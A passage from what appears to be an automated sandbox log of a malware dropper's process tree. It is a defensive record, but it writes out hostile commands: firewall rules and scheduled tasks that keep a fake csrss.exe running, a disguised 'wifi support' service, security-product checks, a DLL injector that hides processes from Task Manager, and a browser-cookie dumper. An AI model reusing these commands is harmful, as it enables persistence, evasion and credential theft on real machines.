PID 4936 wrote to memory of 640	4936	Files.exe	jfiag3g_gg.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe
PID 3888 wrote to memory of 2620	3888	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe
"C:\Users\Admin\AppData\Local\Temp\036eca91f78aa89c3708f5146f20d6ea8fa46db87d57fe90626c249f04c82bbf.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1952

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:860

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
3⤵
- Executes dropped EXE
PID:4864

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 328
3⤵
- Program crash
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 332
3⤵
- Program crash
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 356
3⤵
- Program crash
PID:1460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 664
3⤵
- Program crash
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 664
3⤵
- Program crash
PID:3612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 664
3⤵
- Program crash
PID:2972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 728
3⤵
- Program crash
PID:5048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 736
3⤵
- Program crash
PID:3840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 752
3⤵
- Program crash
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 616
3⤵
- Program crash
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 688
3⤵
- Program crash
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 828
3⤵
- Program crash
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 752
3⤵
- Program crash
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 840
3⤵
- Program crash
PID:1848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 800
3⤵
- Program crash
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 884
3⤵
- Program crash
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 860
3⤵
- Program crash
PID:640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 852
3⤵
- Program crash
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 708
3⤵
- Program crash
PID:2024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 892
3⤵
- Program crash
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 604
3⤵
- Program crash
PID:3928

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 292
4⤵
- Program crash
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 296
4⤵
- Program crash
PID:428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 296
4⤵
- Program crash
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 632
4⤵
- Program crash
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 632
4⤵
- Program crash
PID:4112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 692
4⤵
- Program crash
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 704
4⤵
- Program crash
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 712
4⤵
- Program crash
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 704
4⤵
- Program crash
PID:1260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 776
4⤵
- Program crash
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 848
4⤵
- Program crash
PID:4784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 836
4⤵
- Program crash
PID:1476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 848
4⤵
- Program crash
PID:4212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 780
4⤵
- Program crash
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 844
4⤵
- Program crash
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:4668

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:1140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 712
4⤵
- Program crash
PID:1484

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 328
5⤵
- Program crash
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 332
5⤵
- Program crash
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 332
5⤵
- Program crash
PID:5876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 664
5⤵
- Program crash
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 720
5⤵
- Program crash
PID:6084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 720
5⤵
- Program crash
PID:6124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 720
5⤵
- Program crash
PID:5132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 752
5⤵
- Program crash
PID:2076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 700
5⤵
- Program crash
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 688
5⤵
- Program crash
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 672
5⤵
- Program crash
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 864
5⤵
- Program crash
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 872
5⤵
- Program crash
PID:5500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 888
5⤵
- Program crash
PID:5008

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 956
5⤵
- Program crash
PID:5772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 972
5⤵
- Program crash
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 924
5⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 908
5⤵
- Program crash
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1092
5⤵
- Program crash
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1108
5⤵
- Program crash
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 924
5⤵
- Program crash
PID:4976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1012
5⤵
- Program crash
PID:5728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1120
5⤵
- Program crash
PID:5440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1012
5⤵
- Program crash
PID:5560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5348 -s 1120
5⤵
- Program crash
PID:1796

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2264

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:5240

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:2376

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:1708

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4936

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4296

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:640

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2912

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies system certificate store
PID:3308

C:\Users\Admin\Pictures\Adobe Films\p5lV_fxNgeBmvlsX0iHfEDvs.exe
"C:\Users\Admin\Pictures\Adobe Films\p5lV_fxNgeBmvlsX0iHfEDvs.exe"
3⤵
- Executes dropped EXE
PID:5776

C:\Users\Admin\Pictures\Adobe Films\xT8oVG7Ymi6m1fV0UMC5DZ8z.exe
"C:\Users\Admin\Pictures\Adobe Films\xT8oVG7Ymi6m1fV0UMC5DZ8z.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3148

C:\Users\Admin\Documents\kbhDLwsahLlhjOM1qB7TizoL.exe
"C:\Users\Admin\Documents\kbhDLwsahLlhjOM1qB7TizoL.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:6980

C:\Users\Admin\Pictures\Adobe Films\JJF1yhpiuYUKRR0KoYjucI03.exe
"C:\Users\Admin\Pictures\Adobe Films\JJF1yhpiuYUKRR0KoYjucI03.exe"
5⤵
PID:3908

C:\Users\Admin\Pictures\Adobe Films\JOBV4rsq8gU8LHeozqd2JrZl.exe
"C:\Users\Admin\Pictures\Adobe Films\JOBV4rsq8gU8LHeozqd2JrZl.exe"
5⤵
PID:4100

C:\Users\Admin\AppData\Local\Temp\is-CD6LB.tmp\JOBV4rsq8gU8LHeozqd2JrZl.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CD6LB.tmp\JOBV4rsq8gU8LHeozqd2JrZl.tmp" /SL5="$4037A,140006,56320,C:\Users\Admin\Pictures\Adobe Films\JOBV4rsq8gU8LHeozqd2JrZl.exe"
6⤵
PID:4636

C:\Users\Admin\Pictures\Adobe Films\L3GfH43vEOQyvuW5kHK8OsWp.exe
"C:\Users\Admin\Pictures\Adobe Films\L3GfH43vEOQyvuW5kHK8OsWp.exe"
5⤵
PID:732

C:\Users\Admin\Pictures\Adobe Films\mI2zmRMCzPG_1oE5_fwerCv_.exe
"C:\Users\Admin\Pictures\Adobe Films\mI2zmRMCzPG_1oE5_fwerCv_.exe"
5⤵
PID:2172

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
6⤵
PID:5164

C:\Users\Admin\Pictures\Adobe Films\u7DN9pcYUiYWPsUYNdv2sT22.exe
"C:\Users\Admin\Pictures\Adobe Films\u7DN9pcYUiYWPsUYNdv2sT22.exe"
5⤵
PID:6132

C:\Users\Admin\Pictures\Adobe Films\mRKFM_tDV24utJhESRX5H1R4.exe
"C:\Users\Admin\Pictures\Adobe Films\mRKFM_tDV24utJhESRX5H1R4.exe"
5⤵
PID:5604

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:7060

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:5904

C:\Users\Admin\Pictures\Adobe Films\ZkQF5B0SU36FG_P5aqhYpUY5.exe
"C:\Users\Admin\Pictures\Adobe Films\ZkQF5B0SU36FG_P5aqhYpUY5.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5148

C:\Users\Admin\Pictures\Adobe Films\Yrl6mQelU772YDzLxKLlvTON.exe
"C:\Users\Admin\Pictures\Adobe Films\Yrl6mQelU772YDzLxKLlvTON.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5212

C:\Users\Admin\Pictures\Adobe Films\y26j85o5orQWhRjG019OdhO1.exe
"C:\Users\Admin\Pictures\Adobe Films\y26j85o5orQWhRjG019OdhO1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 624
4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 632
4⤵
PID:4180

C:\Users\Admin\Pictures\Adobe Films\0xcuKppcvRYJEXv5vQV5b3EE.exe
"C:\Users\Admin\Pictures\Adobe Films\0xcuKppcvRYJEXv5vQV5b3EE.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5360

C:\Users\Admin\Pictures\Adobe Films\yylv0bFITZ3B6YKSlojcSQEb.exe
"C:\Users\Admin\Pictures\Adobe Films\yylv0bFITZ3B6YKSlojcSQEb.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3268

C:\Users\Admin\Pictures\Adobe Films\fZUCD3AXYtPe3U3cgu57MhaF.exe
"C:\Users\Admin\Pictures\Adobe Films\fZUCD3AXYtPe3U3cgu57MhaF.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mtdbqc\
4⤵
PID:6148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\loedwyfi.exe" C:\Windows\SysWOW64\mtdbqc\
4⤵
PID:6372

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create mtdbqc binPath= "C:\Windows\SysWOW64\mtdbqc\loedwyfi.exe /d\"C:\Users\Admin\Pictures\Adobe Films\fZUCD3AXYtPe3U3cgu57MhaF.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:6632

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description mtdbqc "wifi internet conection"
4⤵
PID:6732

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start mtdbqc
4⤵
PID:6792

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:6988

C:\Users\Admin\Pictures\Adobe Films\kBDprAYWDgrekXLdLmPlvbrG.exe
"C:\Users\Admin\Pictures\Adobe Films\kBDprAYWDgrekXLdLmPlvbrG.exe"
3⤵
- Executes dropped EXE
PID:5500

C:\Users\Admin\Pictures\Adobe Films\94P2qFm5TsmeItVEkinn8Bfe.exe
"C:\Users\Admin\Pictures\Adobe Films\94P2qFm5TsmeItVEkinn8Bfe.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping yahoo.com
4⤵
PID:5856

C:\Windows\SysWOW64\PING.EXE
ping yahoo.com
5⤵
- Runs ping.exe
PID:6444

C:\Users\Admin\Pictures\Adobe Films\8nN53RgEjLsU7HMfJixhS7il.exe
"C:\Users\Admin\Pictures\Adobe Films\8nN53RgEjLsU7HMfJixhS7il.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:1840

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
4⤵
PID:6172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
4⤵
PID:6340

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6624

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:1468

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:6348

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:4496

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:5724

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
6⤵
PID:5448

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
Sta.exe.pif V
6⤵
PID:6508

C:\Users\Admin\Pictures\Adobe Films\bPSpWAxIew9oHILHf3g1OKqd.exe
"C:\Users\Admin\Pictures\Adobe Films\bPSpWAxIew9oHILHf3g1OKqd.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5372

C:\Users\Admin\AppData\Local\Temp\is-QINJG.tmp\bPSpWAxIew9oHILHf3g1OKqd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QINJG.tmp\bPSpWAxIew9oHILHf3g1OKqd.tmp" /SL5="$4025E,140006,56320,C:\Users\Admin\Pictures\Adobe Films\bPSpWAxIew9oHILHf3g1OKqd.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5136

C:\Users\Admin\AppData\Local\Temp\is-CJB9Q.tmp\5(6665____.exe
"C:\Users\Admin\AppData\Local\Temp\is-CJB9Q.tmp\5(6665____.exe" /S /UID=91
5⤵
PID:1364

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
6⤵
PID:6116

C:\Users\Admin\Pictures\Adobe Films\hjTxpbdquBV8NC9Cey3c2qjW.exe
"C:\Users\Admin\Pictures\Adobe Films\hjTxpbdquBV8NC9Cey3c2qjW.exe"
3⤵
- Executes dropped EXE
PID:5364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2580

C:\Users\Admin\Pictures\Adobe Films\LPg3_wwTiU2yDi5RWc41_sb2.exe
"C:\Users\Admin\Pictures\Adobe Films\LPg3_wwTiU2yDi5RWc41_sb2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5384

C:\Users\Admin\AppData\Local\Temp\7zS9F46.tmp\Install.exe
.\Install.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5792

C:\Users\Admin\AppData\Local\Temp\7zS2619.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:3356

C:\Users\Admin\Pictures\Adobe Films\JL_70clypUUuVLNEieSPeTOV.exe
"C:\Users\Admin\Pictures\Adobe Films\JL_70clypUUuVLNEieSPeTOV.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:4180

C:\Users\Admin\Pictures\Adobe Films\JL_70clypUUuVLNEieSPeTOV.exe
"C:\Users\Admin\Pictures\Adobe Films\JL_70clypUUuVLNEieSPeTOV.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:396

C:\Users\Admin\Pictures\Adobe Films\HJ82Zji5EzXgVJjXxqQFo7SK.exe
"C:\Users\Admin\Pictures\Adobe Films\HJ82Zji5EzXgVJjXxqQFo7SK.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4984

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:6928

C:\Users\Admin\Pictures\Adobe Films\ldf3XO4wpF2KeP1jUswCvirT.exe
"C:\Users\Admin\Pictures\Adobe Films\ldf3XO4wpF2KeP1jUswCvirT.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5828

C:\Users\Admin\Pictures\Adobe Films\ldf3XO4wpF2KeP1jUswCvirT.exe
"C:\Users\Admin\Pictures\Adobe Films\ldf3XO4wpF2KeP1jUswCvirT.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6864

C:\Users\Admin\Pictures\Adobe Films\mZkbGUdQk2vacg7qyKpG0jlH.exe
"C:\Users\Admin\Pictures\Adobe Films\mZkbGUdQk2vacg7qyKpG0jlH.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5572

C:\Users\Admin\Pictures\Adobe Films\h2p_WwwxN2hmoFLDtYdDzrSQ.exe
"C:\Users\Admin\Pictures\Adobe Films\h2p_WwwxN2hmoFLDtYdDzrSQ.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5568

C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe
"C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1776

C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe
"C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe"
4⤵
- Executes dropped EXE
PID:6496

C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe
"C:\Users\Admin\Pictures\Adobe Films\QnA54ofVLN_vdz3XGsCEJybm.exe"
4⤵
- Executes dropped EXE
PID:6760

C:\Users\Admin\Pictures\Adobe Films\j9czdh4qGe3Kc5uEhqFDTMCo.exe
"C:\Users\Admin\Pictures\Adobe Films\j9czdh4qGe3Kc5uEhqFDTMCo.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5556

C:\Users\Admin\Pictures\Adobe Films\vJTNSHqpM_uXMxqzh7RXQZMP.exe
"C:\Users\Admin\Pictures\Adobe Films\vJTNSHqpM_uXMxqzh7RXQZMP.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1284

C:\Users\Admin\Pictures\Adobe Films\vZRazqC1JjHdbGBRX5CY5qkl.exe
